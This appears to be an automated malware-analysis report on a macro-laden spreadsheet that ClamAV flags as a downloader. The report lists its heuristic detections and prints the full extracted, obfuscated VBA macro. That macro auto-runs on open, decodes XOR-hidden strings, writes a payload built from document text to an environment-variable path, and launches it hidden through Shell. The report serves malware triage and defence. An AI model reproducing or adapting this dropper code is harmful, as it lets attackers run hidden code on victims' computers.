MALICIOUS
274
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
iqMNfMciymt = Shell(UjlvuqKIHdBq, vbHide) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(188, ((2 Xor 5) + 1), (89 Xor 213), 250, ((1 Xor 2) + 180), ((26 Xor 213) + (17 Xor 48)), ((0 Xor 6) + (0 Xor 0))), (1 Xor 29)) & ZEhUXsDsoWYHe(Array(35, (25 + 26), ((13 Xor 26) + (204 Xor 16)), ((96 Xor 208) + 35)), ((8 Xor 43) + 0))) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9515 bytes |
SHA-256: 208d7313d0191647f0071b46ffed2ce896681903835889606a5f78ef60840ee5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private XrulaBsYQOl As Boolean
Private OpkIVWsYsjVQm((0 + (0 Xor 0)) To (27 Xor 36)) As Byte
Private SEyYJedjJBxv((0 + 0) To 127) As Byte
Sub Auto_Open()
ysFjSqAVJFMImt
End Sub
Sub ysFjSqAVJFMImt()
Dim iqMNfMciymt As Integer
Dim UQwqYykHUgzK As String
Dim oEEcKafXWM As String
Dim TNOtbmqbsTuYkf As Integer
Dim qTbUsdrBuQDJu As Paragraph
Dim sqRUJThqSc As Integer
Dim XdAYAIZcZJadlr As Boolean
Dim QIPOooOSvsZf As Integer
Dim LskvXAzGTeFjv As String
Dim zSpMnoIxBxtUNd As Byte
Dim VhvtTnjldRJJt As String
VhvtTnjldRJJt = ZEhUXsDsoWYHe(Array((90 Xor 234), (1 Xor 172), (44 Xor 28)), (0 Xor 0)) & ZEhUXsDsoWYHe(Array((86 Xor 33), (19 Xor 7), ((61 Xor 85) + (3 Xor 33)), (98 + 112), 93, (14 + 188), (89 + 27)), (3 Xor 0))
UQwqYykHUgzK = ZEhUXsDsoWYHe(Array((78 + 78), (154 Xor 1), (6 Xor 24), ((54 Xor 99) + 1), 83, ((39 Xor 126) + 12), (164 + 29)), 10) & ZEhUXsDsoWYHe(Array((30 Xor 236), (0 + 233), 176, ((1 Xor 3) + (0 Xor 7)), (54 + 119), (45 Xor 120), (50 + 55), (62 + 176), ((129 Xor 31) + (11 Xor 45)), (28 Xor 40), 175), 17)
oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(188, ((2 Xor 5) + 1), (89 Xor 213), 250, ((1 Xor 2) + 180), ((26 Xor 213) + (17 Xor 48)), ((0 Xor 6) + (0 Xor 0))), (1 Xor 29)) & ZEhUXsDsoWYHe(Array(35, (25 + 26), ((13 Xor 26) + (204 Xor 16)), ((96 Xor 208) + 35)), ((8 Xor 43) + 0)))
ChDrive (oEEcKafXWM)
ChDir (oEEcKafXWM)
TNOtbmqbsTuYkf = FreeFile()
Open UQwqYykHUgzK For Binary As TNOtbmqbsTuYkf
For Each qTbUsdrBuQDJu In ActiveDocument.Paragraphs
DoEvents
LskvXAzGTeFjv = qTbUsdrBuQDJu.Range.Text
If (XdAYAIZcZJadlr = True) Then
sqRUJThqSc = (0 Xor 1)
While (sqRUJThqSc < Len(LskvXAzGTeFjv))
zSpMnoIxBxtUNd = Mid(LskvXAzGTeFjv, sqRUJThqSc, 4)
Put #TNOtbmqbsTuYkf, , zSpMnoIxBxtUNd
sqRUJThqSc = sqRUJThqSc + 4
Wend
ElseIf (InStr((0 Xor 1), LskvXAzGTeFjv, VhvtTnjldRJJt) > ((0 Xor 0) + 0) And Len(LskvXAzGTeFjv) > ((0 Xor 0) + (0 Xor 0))) Then
XdAYAIZcZJadlr = True
End If
Next
Close #TNOtbmqbsTuYkf
VdmEyIHJNTm (UQwqYykHUgzK)
End Sub
Sub VdmEyIHJNTm(UjlvuqKIHdBq As String)
Dim iqMNfMciymt As Integer
Dim oEEcKafXWM As String
oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(((11 Xor 4) + (4 Xor 63)), (103 Xor 251), (64 + (84 Xor 218)), (66 + 60)), (38 + 1)) & ZEhUXsDsoWYHe(Array((117 Xor 224), (11 Xor 107), (24 + 219), (61 + 101), ((1 Xor 2) + 1), ((51 Xor 254) + 4), (35 + 26)), ((18 Xor 13) + 12)))
ChDrive (oEEcKafXWM)
ChDir (oEEcKafXWM)
iqMNfMciymt = Shell(UjlvuqKIHdBq, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Public Function UxOukolzWbcM(ByVal awZORnGkGAJ As String) As Byte()
If Not XrulaBsYQOl Then aLzRDfqSYy
Dim NSUSywrZAzUs() As Byte: NSUSywrZAzUs = tktqrAGOEWt(awZORnGkGAJ)
Dim rApyFRJpIsWH As Long: rApyFRJpIsWH = UBound(NSUSywrZAzUs) + ((1 Xor 0) + (0 Xor 0))
If rApyFRJpIsWH Mod (2 + (0 Xor 2)) <> (0 Xor 0) Then Err.Raise vbObjectError, , ""
Do While rApyFRJpIsWH > 0
If NSUSywrZAzUs(rApyFRJpIsWH - 1) <> Asc("=") Then Exit Do
rApyFRJpIsWH = rApyFRJpIsWH - ((0 Xor 0) + 1)
Loop
Dim lBUiHVvWeJjd As Long: lBUiHVvWeJjd = (rApyFRJpIsWH * 3) \ (4 Xor 0)
Dim kpfdlmFugsWuN() As Byte
ReDim kpfdlmFugsWuN(((0 Xor 0) + (0 Xor 0)) To lBUiHVvWeJjd - (0 + 1)) As Byte
Dim ngWTfdXRUWL As Long
Dim symvazlvYcTy As Long
Do While ngWTfdXRUWL < rApyFRJpIsWH
Dim aoJdsYVKgwtt As Byte: aoJdsYVKgwtt = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + (1 Xor 0))
Dim EIWzhNQmIFxFll As Byte: EIWzhNQmIFxFll = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + (0 Xor 1))
Dim tXrnecmcqaXxYi As Byte: If ngWTfdXRUWL < rApyFRJpIsWH Then tXrnecmcqaXxYi = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + 1 Else tXrnecmcqaXxYi = Asc("A")
Dim bYSOfmpQYCL As Byte: If ngWTfdXRUWL < rApyFRJpIsWH Then bYSOfmpQYCL = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + 1) Else bYSOfmpQYCL = Asc("A")
If aoJdsYVKgwtt > (11 + 116) Or EIWzhNQmIFxFll > (103 Xor 24) Or tXrnecmcqaXxYi > (103 Xor 24) Or bYSOfmpQYCL > ((11 Xor 67) + (43 Xor 28)) Then _
Err.Raise vbObjectError, , ""
Dim qgtOOiPrlhIx As Byte: qgtOOiPrlhIx = SEyYJedjJBxv(aoJdsYVKgwtt)
Dim VdvNJEMLNYJT As Byte: VdvNJEMLNYJT = SEyYJedjJBxv(EIWzhNQmIFxFll)
Dim UMhGjiXDGyIt As Byte: UMhGjiXDGyIt = SEyYJedjJBxv(tXrnecmcqaXxYi)
Dim bcjCqVmaMYA As Byte: bcjCqVmaMYA = SEyYJedjJBxv(bYSOfmpQYCL)
If qgtOOiPrlhIx > ((24 Xor 2) + 37) Or VdvNJEMLNYJT > (63 + 0) Or UMhGjiXDGyIt > 63 Or bcjCqVmaMYA > (8 + 55) Then _
Err.Raise vbObjectError, , ""
Dim pbfDoigJnLHmv As Byte: pbfDoigJnLHmv = (qgtOOiPrlhIx * (1 + (1 Xor 2))) Or (VdvNJEMLNYJT \ &H10)
Dim fLlkgWKAiPhZH As Byte: fLlkgWKAiPhZH = ((VdvNJEMLNYJT And &HF) * &H10) Or (UMhGjiXDGyIt \ (4 + (0 Xor 0)))
Dim gzFjFdCVPSP As Byte: gzFjFdCVPSP = ((UMhGjiXDGyIt And (3 + 0)) * &H40) Or bcjCqVmaMYA
kpfdlmFugsWuN(symvazlvYcTy) = pbfDoigJnLHmv: symvazlvYcTy = symvazlvYcTy + 1
If symvazlvYcTy < lBUiHVvWeJjd Then kpfdlmFugsWuN(symvazlvYcTy) = fLlkgWKAiPhZH: symvazlvYcTy = symvazlvYcTy + (0 Xor 1)
If symvazlvYcTy < lBUiHVvWeJjd Then kpfdlmFugsWuN(symvazlvYcTy) = gzFjFdCVPSP: symvazlvYcTy = symvazlvYcTy + (0 Xor 1)
Loop
UxOukolzWbcM = kpfdlmFugsWuN
End Function
Private Sub aLzRDfqSYy()
Dim ssaTdUUgQRIdsw As Integer, eUCvYZpkHkcBQ As Integer
eUCvYZpkHkcBQ = (0 + 0)
For ssaTdUUgQRIdsw = Asc("A") To Asc("Z"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + 1: Next
For ssaTdUUgQRIdsw = Asc("a") To Asc("z"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + ((0 Xor 0) + 1): Next
For ssaTdUUgQRIdsw = Asc("0") To Asc("9"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + (0 Xor 1)): Next
OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = Asc("+"): eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + 1)
OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = Asc("/"): eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + (0 Xor 1))
For eUCvYZpkHkcBQ = (0 Xor 0) To (56 + 71): SEyYJedjJBxv(eUCvYZpkHkcBQ) = (92 + (94 Xor 253)): Next
For eUCvYZpkHkcBQ = 0 To 63: SEyYJedjJBxv(OpkIVWsYsjVQm(eUCvYZpkHkcBQ)) = eUCvYZpkHkcBQ: Next
XrulaBsYQOl = True
End Sub
Private Function tktqrAGOEWt(ByVal awZORnGkGAJ As String) As Byte()
Dim VdvNJEMLNYJT() As Byte: VdvNJEMLNYJT = awZORnGkGAJ
Dim IJYSeTzKbHxG As Long: IJYSeTzKbHxG = (UBound(VdvNJEMLNYJT) + 1) \ 2
If IJYSeTzKbHxG = 0 Then tktqrAGOEWt = VdvNJEMLNYJT: Exit Function
Dim UMhGjiXDGyIt() As Byte
ReDim UMhGjiXDGyIt(((0 Xor 0) + (0 Xor 0)) To IJYSeTzKbHxG - (0 Xor 1)) As Byte
Dim VcbBAhzgHTdzV As Long
For VcbBAhzgHTdzV = (0 Xor 0) To IJYSeTzKbHxG - (1 Xor 0)
Dim ssaTdUUgQRIdsw As Long: ssaTdUUgQRIdsw = VdvNJEMLNYJT(2 * VcbBAhzgHTdzV) + 256 * CLng(VdvNJEMLNYJT(((2 Xor 0) + (0 Xor 0)) * VcbBAhzgHTdzV + 1))
If ssaTdUUgQRIdsw >= ((171 Xor 103) + 52) Then ssaTdUUgQRIdsw = Asc("?")
UMhGjiXDGyIt(VcbBAhzgHTdzV) = ssaTdUUgQRIdsw
Next
tktqrAGOEWt = UMhGjiXDGyIt
End Function
Private Function ZEhUXsDsoWYHe(wIqFnFMGIALqK As Variant, FSHZRvybVS As Integer)
Dim dAsFQiGsHPNQlA As String
Dim UUYNHTLpdFiK() As Byte
UUYNHTLpdFiK = UxOukolzWbcM("5c5WBHX4oy2/EP/6aSwqL6CQoP5f5xAqwKFMyulbyajnokller+WH8+LLMUyvORNnXg=")
dAsFQiGsHPNQlA = ""
For eUCvYZpkHkcBQ = LBound(wIqFnFMGIALqK) To UBound(wIqFnFMGIALqK)
dAsFQiGsHPNQlA = dAsFQiGsHPNQlA & Chr(UUYNHTLpdFiK(eUCvYZpkHkcBQ + FSHZRvybVS) Xor wIqFnFMGIALqK(eUCvYZpkHkcBQ))
Next
ZEhUXsDsoWYHe = dAsFQiGsHPNQlA
End Function
Attribute VB_Name = "Module2"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("D420")) Is Nothing Then
Call ghd
End If
End If
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 54272 bytes |
SHA-256: 74c5d14853005cebe39eef7606c2837f7d16e792872dac6c03706855007f7651 |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
likely
421 of 626 identifiers look randomly generated (e.g. 'MqsvsuNwj0Bn3kDf4kCHgFNWhJZoQTnRFRSuig5Y') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.